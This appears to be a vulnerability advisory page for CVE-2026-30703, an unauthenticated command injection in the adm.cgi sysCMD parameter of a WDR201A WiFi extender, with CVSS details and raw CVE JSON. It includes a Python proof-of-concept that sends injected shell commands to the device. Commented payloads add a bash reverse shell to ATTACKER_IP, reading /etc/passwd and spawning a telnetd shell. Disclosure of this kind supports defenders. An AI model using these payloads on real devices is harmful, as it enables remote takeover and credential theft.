Security Vulnerability Report
中文
CVE-2026-30703 CVSS 9.8 CRITICAL

CVE-2026-30703

Published: 2026-03-18 18:16:28
Last Modified: 2026-03-23 16:16:46
Source: [email protected]

Description

A command injection vulnerability exists in the web management interface of the WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02). The adm.cgi endpoint improperly sanitizes user-supplied input provided to a command-related parameter in the sysCMD functionality.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WiFi Extender WDR201A Hardware V2.1
WiFi Extender WDR201A Firmware LFMZX28040922V1.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-30703 PoC - WiFi Extender WDR201A Command Injection # Target: adm.cgi endpoint with sysCMD parameter target_ip = "192.168.0.1" # Replace with actual device IP target_url = f"http://{target_ip}/adm.cgi" # Payload to list all files and directories payload = ";ls -la;" params = { "sysCMD": payload } try: response = requests.get(target_url, params=params, timeout=10) print(f"[*] Request sent to {target_url}") print(f"[*] Status code: {response.status_code}") print(f"[*] Response preview: {response.text[:500]}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") # Additional payloads for testing: # Reverse shell: ";bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1;" # Read passwd: ";cat /etc/passwd;" # Enable telnet: ";/usr/sbin/telnetd -l /bin/sh;"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30703", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:27.967", "lastModified": "2026-03-23T16:16:45.920", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in the web management interface of the WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02). The adm.cgi endpoint improperly sanitizes user-supplied input provided to a command-related parameter in the sysCMD functionality."}, {"lang": "es", "value": "Existe una vulnerabilidad de inyección de comandos en la interfaz de gestión web del Extensor WiFi WDR201A (HW V2.1, FW LFMZX28040922V1.02). El endpoint adm.cgi sanitiza de forma inadecuada la entrada suministrada por el usuario proporcionada a un parámetro relacionado con comandos en la funcionalidad sysCMD."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "[email protected]"}, {"url": "https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China", "source": "[email protected]"}, {"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.